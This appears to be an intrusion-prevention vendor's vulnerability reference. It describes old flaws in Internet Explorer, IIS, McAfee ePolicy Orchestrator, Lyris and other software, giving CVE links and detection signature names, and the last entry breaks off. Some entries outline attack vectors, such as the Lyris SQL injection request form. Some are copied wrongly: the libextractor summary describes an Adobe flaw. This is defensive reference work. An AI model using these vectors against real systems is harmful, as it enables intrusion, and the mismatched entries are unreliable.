Description: Microsoft Internet Explorer does not handle correctly references to CLSIDs that reference certain COM objects that are not ActiveX controls. The vulnerability can be triggered by viewing a malicious HTML page with Internet Explorer, and a successful exploit allows arbitrary code execution on the victims computer. This vulnerability covers also CVE-2005-2127 and CVE-2005-2831.
Situation: HTTP_Internet-Explorer-Multiple-Com-Objects-System-Compromise
File-Text_Internet-Explorer-Multiple-Com-Objects-System-Compromise
References:
CVE-2005-1990
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1990
BID-14511
http://www.securityfocus.com/bid/14511
MS05-038
http://technet.microsoft.com/security/bulletin/MS05-038
Back to top

HTTP-Internet-Explorer-Nested-Object-Tag-Memory-Corruption

About this vulnerability: Internet Explorer nested OBJECT tag handling vulnerability
Risk: High
First detected in: sgpkg-ips-65-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0
Type: Malfunction
Description: Microsoft Internet Explorer has a vulnerability in the handling of nested OBJECT tags. 32 nested OBJECT elements which do not result in the creation of valid objects cause memory corruption, which may allow the execution of arbitrary code with the currently logged in user's privileges. Victims need to be tricked into viewing a malicious HTML page to exploit this vulnerability.
Situation: HTTP_Internet-Explorer-Nested-Object-Tag-Memory-Corruption
File-Text_Internet-Explorer-Nested-Object-Tag-Memory-Corruption
References:
CVE-2006-1992
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1992
BID-17658
http://www.securityfocus.com/bid/17658
OSVDB-27475
http://www.osvdb.org/27475
MS06-021
http://technet.microsoft.com/security/bulletin/MS06-021
Back to top

HTTP-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption

About this vulnerability: Memory corruption vulnerability in the instantiation of certain COM objects in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-111-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a memory corruption vulnerability in the instantiation of certain COM objects in Microsoft Internet Explorer. The vulnerability can be exploited remotely by persuading a user to visit a malicious web site with the vulnerable browser to execute arbitrary code under the context of the currently logged-in user.
Situation: HTTP_SS-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation-Memory-Corruption
File-Text_Microsoft-Internet-Explorer-Urlmon.dll-Com-Object-Instantiation
References:
CVE-2007-0218
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0218
BID-24372
http://www.securityfocus.com/bid/24372
OSVDB-35348
http://www.osvdb.org/35348
MS07-033
http://technet.microsoft.com/security/bulletin/MS07-033
Back to top

HTTP-Internet-Information-Server-Help-Facility-Cross-Site-Scripting

About this vulnerability: A cross site scripting vulnerability in Microsoft Internet Information Server
Risk: Low
First detected in: sgpkg-ips-92-1314
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0; IIS 5.1
Type: Cross-site Scripting
Description: There is a cross site scripting vulnerability in Microsoft Internet Information Server. A crafted request made to the affected service may be used to forge search results or other information in the site.
References:
CVE-2002-0074
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0074
BID-4483
http://www.securityfocus.com/bid/4483
OSVDB-3338
http://www.osvdb.org/3338
MS02-018
http://technet.microsoft.com/security/bulletin/MS02-018
Back to top

HTTP-Internet-Information-Server-Phone-Book-Service-BOF

About this vulnerability: A buffer overflow vulnerability in Microsoft IIS Phone Book Service
Risk: High
First detected in: sgpkg-ips-254-3038
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: IIS 4.0; IIS 5.0; IIS 5.1
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Microsoft Internet Information Server Phone Book Service. A crafted request made to the affected service may be used to gain remote administrative access to the server
Situation: HTTP_CSU-Microsoft-IIS-Malformed-Url
HTTP_CSU-IIS-Phone-Book-BOF
References:
CVE-2000-1089
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-1089
BID-2048
http://www.securityfocus.com/bid/2048
MS00-094
http://technet.microsoft.com/security/bulletin/MS00-094
Back to top

HTTP-InterScan-VirusWall-Multiple-BOF

About this vulnerability: InterScan VirusWall BOF
Risk: High
First detected in: sgpkg-ips-1-1102
Last changed: sgpkg-ips-1602-5242
Platform: Windows NT
Software: InterScan VirusWall
Type: Buffer Overflow
Description: The management interface of the Trend Micro InterScan VirusWall contains several buffer overflow vulnerabilities which could allow an attacker to gain access to the system.
References:
CVE-2001-0432
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0432
BID-2808
http://www.securityfocus.com/bid/2808
Back to top

HTTP-Ipc-At-Chip-ChipCfg-Cgi-Information-Disclosure

About this vulnerability: ChipCfg script on IPC@CHIP discloses sensitive information
Risk: Low
First detected in: sgpkg-ips-15-1210
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: IPC@CHIP Embedded-Webserver
Type: Insecure Configuration
Description: IPC@CHIP has a cgi script ChipCfg.cgi installed by default, which can be exploited to disclose sensitive network information.
References:
CVE-2001-1341
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1341
BID-2767
http://www.securityfocus.com/bid/2767
Back to top

HTTP-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow

About this vulnerability: Buffer Overflow in Ipswitch WhatsUp Gold _maincfgret.cgi versions before 8.03 Hotfix 1
Risk: Moderate
First detected in: sgpkg-ips-105-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Ipswitch WhatsUp Gold
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the _maincfgret.cgi script for Ipswitch WhatsUp Gold versions up to 8.03. A successful exploit allows remote attackers to execute arbitrary code via a long instancename parameter.
Situation: HTTP_CRL-Ipswitch-WhatsUp-Maincfgret-Buffer-Overflow
References:
CVE-2004-0798
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0798
BID-11109
http://www.securityfocus.com/bid/11109
OSVDB-9177
http://www.osvdb.org/9177
Back to top

HTTP-Ipswitch-WhatsUp-Web-Interface-SQL-Injection

About this vulnerability: Ipswitch WhatsUp Web Interface SQL Injection vulnerability
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: WhatsUp Professional
Type: SQL Injection
Description: Ipswitch WhatsUp Professional 2005 has an SQL injection vulnerability. A remote attacker can execute arbitrary SQL commands by passing a malicious string as a value of the sUserName parameter in Login.asp.
Situation: HTTP_CRL-Ipswitch-WhatsUp-Web-Interface-SQL-Injection
HTTP_CSU-Ipswitch-WhatsUp-Professional-SQL-Injection
References:
CVE-2005-1250
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1250
BID-14039
http://www.securityfocus.com/bid/14039
OSVDB-17450
http://www.osvdb.org/17450
Back to top

HTTP-IRIX-Webdist-RCE

About this vulnerability: A vulnerability in webdist.cgi allows remote command execution
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: IRIX
Software: <os>
Type: Code Injection
Description: A code injection vulnerability in webdist.cgi allows remote compromise if successfully exploited.
Situation: HTTP_CSU-IRIX-Webdist-RCE
References:
CVE-1999-0039
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0039
BID-374
http://www.securityfocus.com/bid/374
OSVDB-235
http://www.osvdb.org/235
Back to top

HTTP-Isapi-Extension-Buffer-Overflow

About this vulnerability: Buffer overflow in ISAPI Extension of MS Index Server and Indexing Service
Risk: High
First detected in: sgpkg-ips-7-1102
Last changed: sgpkg-ips-1296-5242
Platform: Windows 2000 SP0; Windows 2000 SP1; Windows 2000 SP2
Software: IIS 4.0; IIS 5.0
Type: Buffer Overflow
Description: Buffer overflow vulnerability exists in ISAPI Extension of Microsoft Index Server and Indexing Service. A remote attacker can exploit this vulnerability to execute arbitrary code on the victim host. The Code Red worm exploits this vulnerability.
Situation: HTTP_CRL-Code-Red-Worm-Attack
HTTP_CRL-Code-Red-II-Worm-Attack
HTTP_CRL-Isapi-Extension-Buffer-Overflow-Attack
References:
CVE-2001-0500
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0500
BID-2880
http://www.securityfocus.com/bid/2880
OSVDB-568
http://www.osvdb.org/568
MS01-033
http://technet.microsoft.com/security/bulletin/MS01-033
Back to top

HTTP-JamMail-Command-Execution

About this vulnerability: Command execution vulnerability in JamMail
Risk: Moderate
First detected in: sgpkg-ips-29-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: JamMail
Type: Metacharacter
Description: JamMail has a vulnerability in the parsing of user supplied data given to 'mail' parameter in the jammail.pl script. Remote attacker is able to exploit this vulnerability to execute arbitrary commands via shell metacharacters.
Situation: HTTP_CSU-JamMail-Command-Execution
References:
CVE-2005-1959
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1959
BID-13937
http://www.securityfocus.com/bid/13937
Back to top

HTTP-Libextractor-Multiple-Heap-Buffer-Overflow-Vulnerabilities

About this vulnerability: A vulnerability in Adobe Acrobat Reader allows cross site scripting
Risk: Moderate
First detected in: sgpkg-ips-91-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: libextractor
Type: Buffer Overflow
Description: There are multiple heap buffer overflow vulnerabilities in the GNU libextractor library. A malicious file can be used to trigger the vulnerability in specific file format plugins.
Situation: HTTP_Libextractor-ASF-Heap-Buffer-Overflow
HTTP_Libextractor-Qt-Heap-Buffer-Overflow
File-MPEG_Libextractor-Qt-Heap-Buffer-Overflow
File-Binary_Libextractor-ASF-Heap-Buffer-Overflow
References:
CVE-2006-2458
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2458
BID-18021
http://www.securityfocus.com/bid/18021
Back to top

HTTP-Lyris-Listmanager-Read-Attachment-SQL-Injection

About this vulnerability: Lyris ListManager arbitrary SQL injection via numerical argument to read/attachment URL
Risk: Moderate
First detected in: sgpkg-ips-53-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Lyris ListManager
Type: SQL Injection
Description: Lyris ListManager, an e-mail list managing software, contains SQL injection vulnerabilities. A HTTP request in the form of /read/attachment/<integer>;<sql code>;, where <integer> is any positive integer, allows remote attackers to execute arbitrary SQL commands on the Lyris database. No authentication is required to exploit the vulnerability. A successful attack allows attackers to read or modify application data and possibly to exploit vulnerabilities in the database that is used by the application.
Situation: HTTP_CSU-Lyris-Listmanager-Read-Attachment-SQL-Injection
References:
CVE-2005-4143
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4143
BID-15787
http://www.securityfocus.com/bid/15787
OSVDB-21548
http://www.osvdb.org/21548
Back to top

HTTP-Machineinfo-Cgi-Information-Disclosure

About this vulnerability: Machineinfo script gives hardware configuration
Risk: Low
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1637-5242
Platform: IRIX
Software: SGI MachineInfo cgi script
Type: Insecure Configuration
Description: Some versions of IRIX install by default the machineinfo script. The script provides information about the host computer, such as type of processor, memory, etc. This could be helpful for remote attackers.
References:
CVE-1999-1067
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1067
Back to top

HTTP-Macromedia-JRun-4-Long-Url-Buffer-Overflow

About this vulnerability: Macromedia JRun 4 web server long URL buffer overflow
Risk: High
First detected in: sgpkg-ips-83-1314
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Macromedia JRun 4
Type: Buffer Overflow
Description: Macromedia JRun 4 Web server suffers from a buffer overflow vulnerability in the handling of long URLs. An URL of over 64k will overflow a buffer, and potentially allow remote attackers to execute arbitrary code on the vulnerable host.
Situation: HTTP_CSU-Excessively-Long-Url
References:
CVE-2005-4472
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4472
BID-16026
http://www.securityfocus.com/bid/16026
Back to top

HTTP-Macromedia_JRun_Isapi_Filter_Get_Request_Buffer_Overrun

About this vulnerability: Buffer overflow in Macromedia JRun/Coldfusion ISS ISAPI filter
Risk: Moderate
First detected in: sgpkg-ips-90-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Macromedia JRun 4; ColdFusion
Type: Input Validation
Description: There is a buffer overflow vulnerability when handling long filenames within GET requests in the ISAPI filter for IIS server on Macromedia JRun and Coldfusion MX servers.
Situation: HTTP_CSU-Macromedia-JRun-Isapi-Filter-Get-Request-Buffer-Overrun
References:
CVE-2002-1310
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1310
BID-6122
http://www.securityfocus.com/bid/6122
Back to top

HTTP-MailEnable-Examine_And_Select_Commands_Buffer_Overflow

About this vulnerability: Buffer overflow in mailbox name parameter SELECT command of MailEnable IMAP server
Risk: Moderate
First detected in: sgpkg-ips-107-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailEnable
Type: Malfunction
Description: Various versions of MailEnable's IMAP server contain buffer overflow condition.
Situation: IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Examine-Command
IMAP_Excessively-Long-Mailbox-Name-Argument-In-IMAP-Select-Command
References:
CVE-2006-6290
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6290
BID-21362
http://www.securityfocus.com/bid/21362
Back to top

HTTP-Mailfile-Cgi-File-Disclosure

About this vulnerability: Arbitrary file disclosure vulnerability in mail-file
Risk: Low
First detected in: sgpkg-ips-8-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oatmeal studio's Mail-File
Type: Malfunction
Description: Mailfile.cgi allows specified files to be e-mailed to user specified addresses via a Web interface. Due to improper parsing of arguments, any file readable by the Web server can be sent to any e-mail address. This allows remote attackers to read arbitrary files from the server.
Situation: HTTP_CS-Mailfile-Cgi-File-Disclosure
References:
CVE-2000-0977
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0977
BID-1807
http://www.securityfocus.com/bid/1807
Back to top

HTTP-Mailman-Mmstdod-Cgi-System-Compromise

About this vulnerability: Command execution vulnerability in Endymion MailMan Webmail
Risk: High
First detected in: sgpkg-ips-3-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Endymion MailMan Webmail
Type: Malfunction
Description: The mmstdod.cgi belonging to Endymion MailMan Webmail makes an insecure call to open(). The vulnerability can be exploited by passing shell metacharacters into the alternate_templates parameter, and allows arbitrary commands to be executed on the web server.
Situation: HTTP_CRL-Mailman-Mmstdod-Cgi-System-Compromise
References:
CVE-2001-0021
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0021
BID-2063
http://www.securityfocus.com/bid/2063
Back to top

HTTP-Mailpost-Debug-Information-Disclosure

About this vulnerability: Mailpost displays system information when a debug parameter is used
Risk: Low
First detected in: sgpkg-ips-18-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: MailPost
Type: Malfunction
Description: Mailpost version 5.1.1sv and possibly earlier contain an information disclosure vulnerability. By requesting mailpost.exe with a '*debug*' parameter, the script displays sensitive information about the server.
Situation: HTTP_CSU-Mailpost-Debug-Information-Disclosure
References:
CVE-2004-1103
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1103
BID-11595
http://www.securityfocus.com/bid/11595
Back to top

HTTP-Mailstudio-Cgi-System-Compromise

About this vulnerability: Mailstudio system compromise vulnerabilities
Risk: High
First detected in: sgpkg-ips-4-1102
Last changed: sgpkg-ips-1637-5242
Platform: HP-UX; Linux; Solaris
Software: Mailstudio 2000
Type: Malfunction
Description: 3R Soft's MailStudio 2000 suffers from two vulnerabilities. Maillist.cgi allows remote attackers to view any files readable by the web server because of a directory traversal vulnerability. Userreg.cgi allows commands to be executed as long as they do not contain spaces. Both vulnerabilities can be exploited by passing suitable arguments to the cgi files.
References:
CVE-2000-0526
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0526
BID-1335
http://www.securityfocus.com/bid/1335
Back to top

HTTP-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise

About this vulnerability: Mambo Globals.php mosConfig_absolute_path variable command execution vulnerability
Risk: Moderate
First detected in: sgpkg-ips-47-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Mambo Site Server; Joomla
Type: Malfunction
Description: Mambo Site Server versions 4.6 and earlier are vulnerable to remote command execution due to weak input validation. Remote attackers can supply a mosConfig_absolute_path variable containing the URL of a malicious PHP script to Mambo, causing the webserver to execute arbitrary commands. No user authentication is required to exploit the vulnerability. Includes CVE-2005-3738.
Situation: HTTP_CSU-Mambo-Globals-Php-MosConfig-Absolute-Path-Compromise
References:
CVE-2008-2905
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2905
BID-15461
http://www.securityfocus.com/bid/15461
Back to top

HTTP-Manpage-Lookup-Php-Buildmanpage-File-Disclosure

About this vulnerability: Buildmanpage() in Manpage Lookup allows arbitrary files to be viewed.
Risk: Low
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1637-5242
Platform: Generic
Software: Manpage Lookup
Type: Directory Traversal
Description: The Buildmanpage() function in Manpage Lookup allows remote attackers to view arbitrary files from the host by passing the file name as an argument to 'command'.
References:
CVE-2004-0071
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0071
BID-9395
http://www.securityfocus.com/bid/9395
Back to top

HTTP-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow

About this vulnerability: Buffer overflow vulnerability in the HTTP server component of McAfee ePolicy Orchestrator and ProtectionPilot
Risk: High
First detected in: sgpkg-ips-82-1314
Last changed: sgpkg-ips-1589-5242
Platform: Windows
Software: McAfee ePolicy Orchestrator; McAfee ProtectionPilot
Type: Buffer Overflow
Description: There is a stack-based buffer overflow vulnerability in the handling of the AgentGuid and Source values in McAfee ePolicy Orchestrator and ProtectionPilot. A successful exploitation of this vulnerability leads to a DoS or arbitrary code execution with the privileges of the System user.
Situation: HTTP_CS-McAfee-ePO-HTTP-Server-Header-Processing-Buffer-Overflow
References:
CVE-2006-5156
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5156
BID-20288
http://www.securityfocus.com/bid/20288
OSVDB-29421
http://www.osvdb.org/29421
Back to top

HTTP-McAfee-Epolicy-Orchestrator-DoS

About this vulnerability: Denial-of-service vulnerability in McAfee's ePolicy Orchestrator
Risk: Moderate
First detected in: sgpkg-ips-6-1102
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: McAfee ePolicy Orchestrator
Type: Malfunction
Description: McAfee's ePolicy Orchestrator does not sufficiently check HTTP POST headers, allowing remote attackers to launch a denial-of-service attack by passing an invalid Content-Length value in a request.
Situation: HTTP_CSH-McAfee-Epolicy-Orchestrator-DoS
References:
CVE-2004-0095
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0095
BID-9476
http://www.securityfocus.com/bid/9476
OSVDB-3744
http://www.osvdb.org/3744
Back to top

HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF

About this vulnerability: Buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products
Risk: Moderate
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee ePolicy Orchestrator; McAfee ProtectionPilot
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products. When a crafted HTML page that contains a function call to the ExportSiteList method with a malicious string parameter is viewed with Internet Explorer by a target user who has a vulnerable product installed with the safe for scripting option enabled, arbitrary code can be executed with the user's privileges.
Situation: HTTP_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-ExportSiteList-BOF
References:
CVE-2007-1498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1498
BID-22952
http://www.securityfocus.com/bid/22952
Back to top

HTTP-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF

About this vulnerability: Buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products
Risk: Moderate
First detected in: sgpkg-ips-101-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee ePolicy Orchestrator; McAfee ProtectionPilot
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in the McAfee ePolicy Orchestrator and Protection Pilot products. When a crafted HTML page that contains a function call to the ExportSiteList method with a malicious string parameter is viewed with Internet Explorer by a target user who has a vulnerable product installed with the safe for scripting option enabled, arbitrary code can be executed with the user's privileges.
Situation: HTTP_SS-McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog-BOF
File-Text_McAfee-Epolicy-Orchestrator-SiteManager-ActiveX-VerifyPackageCatalog
References:
CVE-2007-1498
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-1498
BID-22952
http://www.securityfocus.com/bid/22952
Back to top

HTTP-McAfee-Subscription-Manager-ActiveX-Buffer-Overflow

About this vulnerability: McAfee subscription manager library buffer overflow vulnerability
Risk: Moderate
First detected in: sgpkg-ips-77-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: McAfee Security Center
Type: Buffer Overflow
Description: McAfee subscription manager library installed with McAfee Security Center suffers from a buffer overflow vulnerability. The library is a COM object marked safe for scripting, allowing remote attackers to instantiate the COM object representing the library via an HTML page opened with Internet Explorer. Several functions in the library do not validate the length of input arguments before passing them forward, allowing malicious HTML pages to execute arbitrary code when opened with Internet Explorer on a system that has McAfee Security Center installed.
Situation: HTTP_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
File-Text_McAfee-Subscription-Manager-ActiveX-Buffer-Overflow
References:
CVE-2006-3961
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-3961
BID-19265
http://www.securityfocus.com/bid/19265
OSVDB-27698
http://www.osvdb.org/27698
Back to top

HTTP-Mdac-Buffer-Overflow

About this vulnerability: Buffer Overflow in Microsoft Data Access Components (MS02-065)
Risk: High
First detected in: sgpkg-ips-16-1210
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer 5.0; Internet Explorer 5.5; Internet Explorer 6.0; Microsoft SQL Server 2000; Microsoft SQL Server 7.0
Type: Buffer Overflow
Description: The Remote Data Services (RDS) component in Microsoft Data Access Components (MDAC) contains a buffer-overflow vulnerability that can be used to execute arbitrary code. Both web servers (IIS) and clients (Internet Explorer) using RDS are affected by this vulnerability.
Situation: HTTP_CS-MSADCS-Content-Type-BOF
References:
CVE-2002-1142
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1142
BID-6214
http://www.securityfocus.com/bid/6214
MS02-065
http://technet.microsoft.com/security/bulletin/MS02-065
Back to top

HTTP-MediaWiki-Uselang-Php-Code-Execution

About this vulnerability: MediaWiki arbitrary PHP code execution via uselang parameter
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: MediaWiki
Type: Malfunction
Description: MediaWiki does not filter input correctly, which leads to a PHP command execution vulnerability. The value of MediaWiki's uselang parameter is used in an eval() expression without sufficient sanitation, which allows remote attackers to execute arbitrary PHP commands via a crafted HTTP request.
Situation: HTTP_CRL-MediaWiki-Uselang-Php-Code-Execution
References:
CVE-2005-4031
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4031
BID-15703
http://www.securityfocus.com/bid/15703
Back to top

HTTP-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution

About this vulnerability: Code execution vulnerability in Microsoft Access Snapshot Viewer
Risk: Moderate
First detected in: sgpkg-ips-158-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Access Snapshot Viewer
Type: Malfunction
Description: There is a code execution vulnerability in Microsoft Access Snapshot Viewer. By persuading a user to visit a malicious web site, a remote attacker can upload and execute arbitrary files on the victim's system.
Situation: HTTP_SS-Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
File-Text_Microsoft-Access-Snapshot-Viewer-ActiveX-Control-Code-Execution
References:
CVE-2008-2463
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2463
BID-30114
http://www.securityfocus.com/bid/30114
OSVDB-46749
http://www.osvdb.org/46749
MS08-041
http://technet.microsoft.com/security/bulletin/MS08-041
Back to top

HTTP-Microsoft-ASP.NET-Application-Folder-Information-Disclosure

About this vulnerability: Information disclosure vulnerability in Microsoft .NET Framework
Risk: Moderate
First detected in: sgpkg-ips-73-1314
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft .NET Framework
Type: Malfunction
Description: There is an information disclosure vulnerability in Microsoft .NET Framework due to insufficient URL validition. A successful exploitation allows a remote attacker to gain unauthorized access to known files in the Application Code folder.
Situation: HTTP_CSU-Microsoft-ASP.NET-Application-Folder-Information-Disclosure
References:
CVE-2006-1300
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1300
BID-18920
http://www.securityfocus.com/bid/18920
OSVDB-27153
http://www.osvdb.org/27153
MS06-033
http://technet.microsoft.com/security/bulletin/MS06-033
Back to top

HTTP-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution

About this vulnerability: Code execution vulnerability in Microsoft Excel
Risk: High
First detected in: sgpkg-ips-149-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Microsoft Excel
Type: Buffer Overflow
Description: There is a code execution vulnerability in Microsoft Excel. A remote attacker can exploit this vulnerability by persuading a user to open a malicious Excel document with a crafted DVAL record. Successful exploitation could allow the attacker to execute arbitrary code with the privileges of the currently logged on user.
Situation: HTTP_SS-Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
File-OLE_Microsoft-Excel-Data-Validation-Record-Processing-Code-Execution
References:
CVE-2008-0111
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0111
BID-28094
http://www.securityfocus.com/bid/28094
OSVDB-42722
http://www.osvdb.org/42722
MS08-014
http://technet.microsoft.com/security/bulletin/MS08-014
Back to top

HTTP-Microsoft-FrontPage-Server-Extensions-Cross-Site-Scripting

About this vulnerability: Cross site scripting vulnerability in Microsoft FrontPage Server Extensions
Risk: Moderate
First detected in: sgpkg-ips-64-1210
Last changed: sgpkg-ips-1637-5242
Platform: Windows
Software: FrontPage Server Extensions
Type: Cross-site Scripting
Description: The dynamically linked library fpadmdll.dll in Microsoft FrontPage Server Extensions fails to validate the value given in the 'operation' parameter. A remote attacker is able to inject arbitrary HTML or script code into the value of the parameter and use that code to execute cross site scripting attacks in the browsers of other users.
References:
CVE-2006-0015
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0015
BID-17452
http://www.securityfocus.com/bid/17452
MS06-017
http://technet.microsoft.com/security/bulletin/MS06-017
Back to top

HTTP-Microsoft-Help-Facility-ActiveX-Control-Buffer-Overflow

About this vulnerability: Help Facility ActiveX Buffer Overflow
Risk: Moderate
First detected in: sgpkg-ips-132-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: <os>
Type: Buffer Overflow
Description: There is a vulnerability in certain versions of the Microsoft Help Facility ActiveX Controls. The vulnerability can be exploited by luring the target user to a hostile web server that can trigger and exploit the vulnerability. Successful exploitation leads to remote compromise of the client host, allowing the attacker to install bots or other malware on the client system.
Situation: HTTP_SS-Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow
File-Text_Microsoft-Windows-Help-Facility-ActiveX-Control-Buffer-Overflow
References:
CVE-2002-0693
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0693
BID-5874
http://www.securityfocus.com/bid/5874
MS02-055
http://technet.microsoft.com/security/bulletin/MS02-055
Back to top

HTTP-Microsoft-HTML-Help-ActiveX-Control-Remote-Code-Execution-Vulnerability

About this vulnerability: Vulnerability in HTML Help ActiveX Control Can Allow Remote Code Execution
Risk: Moderate
First detected in: sgpkg-ips-96-1314
Last changed: sgpkg-ips-1408-5242
Platform: Windows 2000; Windows 2003; Windows XP
Software: <os>
Type: Malfunction
Description: There is a vulnerability in the Microsoft Windows HTML Help ActiveX control. The flaw is caused by an improper check during the processing of the parameters in HTML Help Control ActiveX Objects. An attacker can exploit this vulnerability to inject and execute arbitrary code in the security context of the currently logged in user.
References:
CVE-2007-0214
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0214
BID-22478
http://www.securityfocus.com/bid/22478
OSVDB-31884
http://www.osvdb.org/31884
MS07-008
http://technet.microsoft.com/security/bulletin/MS07-008
Back to top

HTTP-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution

About this vulnerability: Code execution vulnerability in the tblinf32.dll ActiveX control in Microsoft Internet Explorer
Risk: High
First detected in: sgpkg-ips-118-2032
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Internet Explorer
Type: Malfunction
Description: There is a code execution vulnerability in the tblinf32.dll ActiveX control in Microsoft Internet Explorer. A remote attacker can exploit this vulnerability by enticing a user to visit a crafted web site, which allows the attacker to execute arbitrary code with the privileges of the currently logged in user.
Situation: HTTP_SS-Microsoft-Ie-ActiveX-Object-IObjectsafety-Implementation-Code-Execution
File-Text_Microsoft-Ie-ActiveX-IObjectsafety-Implementation-Code-Execution
References:
CVE-2007-2216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2216
BID-25289
http://www.securityfocus.com/bid/25289
OSVDB-36396
http://www.osvdb.org/36396
MS07-045
http://technet.microsoft.com/security/bulletin/MS07-045
Back to top

HTTP-Microsoft-Ie-Request-Header-Cross-Domain-Information-Disclosure

About this vulnerability: Information disclosure vulnerability in Microsoft Internet Explorer
Risk: Low
First detected in: sgpkg-ips-156-2032
